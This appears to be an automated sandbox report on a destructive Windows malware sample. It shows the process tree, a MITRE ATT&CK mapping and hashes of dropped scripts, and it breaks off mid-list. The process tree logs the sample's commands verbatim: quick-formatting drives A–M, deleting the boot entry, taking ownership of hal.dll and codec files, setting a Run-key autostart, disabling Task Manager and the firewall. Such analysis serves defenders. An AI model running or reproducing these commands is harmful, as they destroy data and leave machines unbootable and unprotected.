- - C:\Windows\system32\format.com
    format /y /q K:
    3⤵
    PID:6972
- - C:\Windows\system32\format.com
    format /y /q L:
    3⤵
    PID:7408
- - C:\Windows\system32\format.com
    format /y /q M:
    3⤵
    PID:7260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:6668
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:3568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:8100
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:6556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:6480
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:6876
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\vidcap.ax"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5556
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\vidcap.ax" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:9132
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\vidcap.ax"
    3⤵
    - Views/modifies file attributes
    PID:9844
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\WSTPager.ax"
    3⤵
    - Possible privilege escalation attempt
    PID:11104
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
  2⤵
  PID:2928
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    PID:1956
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:324
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    PID:1184
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\Twain_32.dll"
    3⤵
    PID:1572
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\Twain_32.dll" /reset /c /q
    3⤵
    PID:2988
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\Twain_32.dll"
    3⤵
    - Views/modifies file attributes
    PID:1216
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
    3⤵
    PID:2736
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:2756
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3940
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4036
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3096
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    PID:4264
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      PID:2648
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:4276
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:4304
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    PID:4724
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4948
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5108
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1772
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3660
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4132
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3536
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1044
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3424
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4340
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:4436
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Modifies file permissions
      PID:6856
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      PID:7088
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:6400
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      PID:6876
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      PID:7184
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:7376
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:8064
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:6748
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:10188
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:10604
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:11088
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:4228
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      PID:6940
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      PID:4960
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:6556
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Modifies file permissions
      PID:6572
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:7284
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      PID:7448
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:6340
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:7272
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:9472
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:10760
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:10192
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:4464
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6792
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      PID:7012
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:7076
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      PID:6356
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:6448
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      PID:6748
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:7876
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:6740
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:9556
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:8796
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:10768
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4472
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    PID:4516
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /reset /t /c /q
    3⤵
    PID:4416
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
    3⤵
    PID:4292
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5272
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5280
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5336
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5352
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:5360
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:5388
- - C:\Windows\system32\format.com
    format /y /q A:
    3⤵
    PID:5468
- - C:\Windows\system32\format.com
    format /y /q B:
    3⤵
    PID:4964
- - C:\Windows\system32\format.com
    format /y /q D:
    3⤵
    PID:5568
- - C:\Windows\system32\format.com
    format /y /q E:
    3⤵
    PID:5872
- - C:\Windows\system32\format.com
    format /y /q F:
    3⤵
    PID:4444
- - C:\Windows\system32\format.com
    format /y /q G:
    3⤵
    PID:6432
- - C:\Windows\system32\format.com
    format /y /q H:
    3⤵
    PID:6736
- - C:\Windows\system32\format.com
    format /y /q I:
    3⤵
    PID:6640
- - C:\Windows\system32\format.com
    format /y /q J:
    3⤵
    PID:7400
- - C:\Windows\system32\format.com
    format /y /q K:
    3⤵
    PID:6440
- - C:\Windows\system32\format.com
    format /y /q L:
    3⤵
    PID:7896
- - C:\Windows\system32\format.com
    format /y /q M:
    3⤵
    PID:8636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:9948
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:10064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:10156
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:10220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:8252
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:8308
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\WSTPager.ax"
    3⤵
    PID:9328
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\WSTPager.ax" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:5896
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\WSTPager.ax"
    3⤵
    PID:12096
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:3004
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\bdaplgin.ax"
  2⤵
  - Possible privilege escalation attempt
  PID:2688
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\bdaplgin.ax" /reset /c /q
  2⤵
  PID:2756
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\bdaplgin.ax"
  2⤵
  - Views/modifies file attributes
  PID:1840
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\g711codc.ax"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1964
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\g711codc.ax" /reset /c /q
  2⤵
  PID:1560
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\g711codc.ax"
  2⤵
  - Views/modifies file attributes
  PID:2216
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\ksproxy.ax"
  2⤵
  - Possible privilege escalation attempt
  PID:1532
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\ksproxy.ax" /reset /c /q
  2⤵
  - Modifies file permissions
  PID:1072
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\ksproxy.ax"
  2⤵
  - Views/modifies file attributes
  PID:1084
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\kstvtune.ax"
  2⤵
  PID:1984
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\kstvtune.ax" /reset /c /q
  2⤵
  PID:1640
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\kstvtune.ax"
  2⤵
  - Views/modifies file attributes
  PID:1220
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\Kswdmcap.ax"
  2⤵
  PID:1768
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\Kswdmcap.ax" /reset /c /q
  2⤵
  PID:2276
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\Kswdmcap.ax"
  2⤵
  PID:656
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\ksxbar.ax"
  2⤵
  - Modifies file permissions
  PID:2948
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\ksxbar.ax" /reset /c /q
  2⤵
  - Modifies file permissions
  PID:3196
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\ksxbar.ax"
  2⤵
  PID:3448
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\Mpeg2Data.ax"
  2⤵
  - Possible privilege escalation attempt
  PID:3888
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\Mpeg2Data.ax" /reset /c /q
  2⤵
  - Possible privilege escalation attempt
  PID:2324
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\Mpeg2Data.ax"
  2⤵
  PID:3372
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\mpg2splt.ax"
  2⤵
  PID:3436
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\mpg2splt.ax" /reset /c /q
  2⤵
  - Possible privilege escalation attempt
  PID:3172
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\mpg2splt.ax"
  2⤵
  PID:4216
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\MSDvbNP.ax"
  2⤵
  - Possible privilege escalation attempt
  PID:4624
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\MSDvbNP.ax" /reset /c /q
  2⤵
  PID:4860
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\MSDvbNP.ax"
  2⤵
  - Views/modifies file attributes
  PID:5092
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\MSNP.ax"
  2⤵
  PID:5220
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\MSNP.ax" /reset /c /q
  2⤵
  PID:5708
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\MSNP.ax"
  2⤵
  - Views/modifies file attributes
  PID:4396
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\psisrndr.ax"
  2⤵
  PID:5628
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\psisrndr.ax" /reset /c /q
  2⤵
  PID:5384
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\psisrndr.ax"
  2⤵
  - Views/modifies file attributes
  PID:2608
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\VBICodec.ax"
  2⤵
  - Modifies file permissions
  PID:6092
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\VBICodec.ax" /reset /c /q
  2⤵
  - Modifies file permissions
  PID:6216
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\VBICodec.ax"
  2⤵
  PID:6500
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\vbisurf.ax"
  2⤵
  - Possible privilege escalation attempt
  PID:6892
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\vbisurf.ax" /reset /c /q
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:6600
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\vbisurf.ax"
  2⤵
  - Views/modifies file attributes
  PID:6808
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\vidcap.ax"
  2⤵
  - Possible privilege escalation attempt
  PID:7420
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\vidcap.ax" /reset /c /q
  2⤵
  - Possible privilege escalation attempt
  PID:3784
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\vidcap.ax"
  2⤵
  PID:6632
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\WSTPager.ax"
  2⤵
  - Possible privilege escalation attempt
  PID:9140
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\System32\WSTPager.ax" /reset /c /q
  2⤵
  PID:10212
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h "C:\Windows\System32\WSTPager.ax"
  2⤵
  - Views/modifies file attributes
  PID:10924
- C:\Windows\system32\takeown.exe
  takeown /f "C:\Windows\System32\DriverStore\FileRepository\averfx2hbtv_x64.inf_amd64_neutral_7216b6fb23536c40\MVDetection64.ax"
  2⤵
  PID:11920

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1711565376-13984280821973917548-32800642216618418301657645900-7742339862061478735"
1⤵
PID:1864

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1484451363153325306-16000721342128829193-1230809748-573401147-827735118-93105246"
1⤵
PID:2692

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-847719854-29007274-6437838081838190785-777669147-448769581-210509918-585690626"
1⤵
PID:2716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
63B

MD5
4cb4efde0d2476b32d5a347a52df6c1b

SHA1
d2b3d042dfc64cc15b41b83b6f0252497a515e95

SHA256
1db6458800616839e864831147cc6d91845825e365925151f649b5d998152273

SHA512
1a676aec628275f5812bc99f7055713986579304df42328559b7a0adeb99601a2a680144a0f3b1685a0126c034cbf9f75ac89cb5cd1c8ca87f7e68824771ebce

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autorun.inf

Filesize
74B

MD5
b39df423c6e5978065a9a8ec4879a3b4

SHA1
96441a7a7d8090f7a96a1160f539531f66568e88

SHA256
12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967

SHA512
2d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bytebeat.sk

Filesize
14KB

MD5
e9841c90b8efdfe12adb284675c29fed

SHA1
10f797135dcb84eee2aea29d4d0ad003bfa60152

SHA256
b9da7f848a953f0fcdd3430f97907c855eb22ca8336acb7f2b3c92551f9070ae

SHA512
b63b7598aacd91d7798c9832a10815320a75d76dc550a79b0229e00d7fbddc4ac26f4b81afa5e459bf949b8a23c4036e5b8fe6078b9b66b90145f3985f94ef72

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bytebeat.sk

Filesize
4KB

MD5
228f81d956279f57c23871e482ae5aa7

SHA1
eeba38e90ae97eea5c5fe18a3bcf618f25fc2974

SHA256
f244461c73ef9f461f1703e4b7b1f649269c495563200f5a6dcf16404155bfc5

SHA512
6484e499a2cbada5c55e052e985401c0da48800d136f57c178eea8117a070496f72679a120a6d1b5e9666a427d74500d2ac3fdd28887521b2dd8fd2671855601

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs

Filesize
57B

MD5
5420b2137427b07b4d6a585ae3b69e08

SHA1
feb511d0b40064ab8a491caf699f5959bc9d4716

SHA256
ae3ab245b4001b487205480988a1aa775de104faf0e5d9c43dd3d1cf285196a1

SHA512
2d5e64f315b8d72e7ff178042cb131baf0d982e74c09455911358ab3552e6e5919ac5f567b1cf31f91ad5613f2b91c5eff5e251e014c230490e4a323da7a7946

Download Submit
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs

Filesize
71B

MD5
c50b8418d9f7ec5980f0bcd9bca4a735

SHA1
d00d3064b043e6cb78476d7820998d9b89f9fdc7

SHA256
48ee941955387e29c12380d852a363bdf22ef49897c0bd814aaeacba6bc852aa

SHA512
0b71f8c7bb3d9be0017dd30cb25500df4a04d77234c9ed36222fda37af1a2b66dc8fccd2fe8c27f164bef7b892e9a6b1745469623cb71f3c3a1700509165f6f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\MouseMove.ps1

Filesize
961B

MD5
fc33e01cce864c6cd9a3cd230acb3594

SHA1
d6244cd6a26139a139605040e6af4c57f6c3024a

SHA256
90926fb4c17f32f4ea75cfa477f6d268f4246ced5907db59bafe468a60190005

SHA512
bfca787a6342d3f276afba162844491b437011ae0e582516de70cd9004422dd9f0cfe520a1a171f495f5398c74056f6961b00471d8d59e86dc061810279dae91

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
3KB

MD5
727dc9a60fa16310daa6e536790cd50e

SHA1
973b656ac52d23edea25d7b9d2142cc67b696daa

SHA256
528baa6e4422344afbc12590bdecd8af86dfc59d9f0a10312cd2b9cfeb429947

SHA512
16173365c3eed6ee51184b610a0dfb0789930a0497545bae85490e9b5cf6bc510520db723b5bdfc09083b28359db9026e8b130e56d3fc49119f64ced8ba7ab8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
173B

MD5
0c998e3681eb9f67fbacda38281c5fa7

SHA1
bd3e89780f374c54c5dfbe3fab83a926ca5803de

SHA256
3c656f47268598c5bbe3ee4661b4f8c7dc09420cf393a6e417541db3c6020205

SHA512
11e3fd1d141bd23a2b0f17665f0f57e5a606fdd82555a7bd88cd533863ce4269d8395f8963d1cdfde93efbb0817486db48c3b593f8de35e150e2395daadb762e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
346B

MD5
4e71aaa85b945ab5dc2680ce12d8474f

SHA1
a00ff196706e8282b02187281a7fa71f20c59eba

SHA256
411d8fc3a482880ec2b56a7193a4104130ca9554f1feb96db27c59a2b61303a5

SHA512
cea3cdb3eb537454ccf9773c80c111d8172dace2c79c62ffe18ac7c4373669d055fd9cc4929f9b6f4f376507a1319e37b0ba26373e40f4332d1acb025792b430

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
519B

MD5
03f0ef4961ee3f5ebc91e222ad5c3a55

SHA1
130947f0716f672e1c0577f60471dfbd9d1f3435

SHA256
b2cf1c83480bb2e69599e063be75ef8188b20c82a03998098d13d42c11502d21

SHA512
641784c8422a15360449ae9d79722e4d6d5752ef8db0a6cd8e1d71e78c5994dc9e790f5e875a7314be603feb42badc587bf79e8f682aa94b2335443ea8592671

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
530B

MD5
a97bccd5d4426007636c50d510628719

SHA1
3c9f75224fd1292d18c4c21f92585a02aec86059

SHA256
5089193fb7b9f2cac4f1193c0cf0731266e804baf2c274fb93b4cebbe4baa40e

SHA512
834d6ffb6919f3f76a97819fefdf86af6e9ce5032d132025237957fe83cc4ca111a1dce08046bdadceaf352ee9b1815f5e5344b48571bd57304b6a2586eb0890

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
544B

MD5
a323e291c8314388610433b765ec64aa

SHA1
c3e640d475b5ebc32d25ae210b04b26591102e48

SHA256
eaa0611742131f0a592fdf76d244a693f3d21bdf05fdd1b1a6d2ca10021eb9db

SHA512
1fb4c792cb458cd9f5c500165b63d7cfa85b8500dc399b0607ec887b74c985dcf6b4780e713944c4d6c0a92b4de6a5063e173e57de476213bd7067cee8739cce

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
581B

MD5
befe91afd78abb4d0e8a58c6c0e5aaf7

SHA1
bcf76118a189eb8e3f2cf51019801a040e730c03

SHA256
42501492cafb8ef4bdbbe53c58e7990a05df2474363316ac912b8835adad91b4

SHA512
af17581a55b569446415ee2205671b474984c8c2b9f05d63d8f0d3b82439234d6e664ee9542a0ec3976f25c7833141e3f3d800b3da4ca6a0e9219717eb9942ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat

Filesize
2KB

MD5
97e8be4af2e5fc71f1b80ab6d934efb1

SHA1
9f9f5169b2a8db1941a0b6c6f6cac953b32a5cb8

SHA256
9a5b02a76a9f5274c5055712f41952084f373fa86a304a704ad0d12378bbd9f3

SHA512
4fabda2a6e8b5f16af1c8b71e2648724ac9a397c1be465b115b6734dc6be7bccc2d2041e7224a13a6de8cff4a16ea7fe0f9844d3e95bbe2dc9a7955dde920cd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
4KB

MD5
cd8f8131ac17c1d2eb2b0fe0aae75e9f

SHA1
5b4b225d4725209458d2d8a6c55cae415e730a23

SHA256
31bf54ef3d5f3291b997769a49c06de6ddf08321b538c870e4c25819e3a39b0b

SHA512
50b290fbce5471989157539ae220e14d8d1a06a8d6f54cf51c5e910a7ec34cd73c4168d40b1f4c2c44cfd5acb0172618c4e1be7420ad0fb66dc30982787b7969

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
5KB

MD5
c10e8521af6528bafd1cd8eee343423b

SHA1
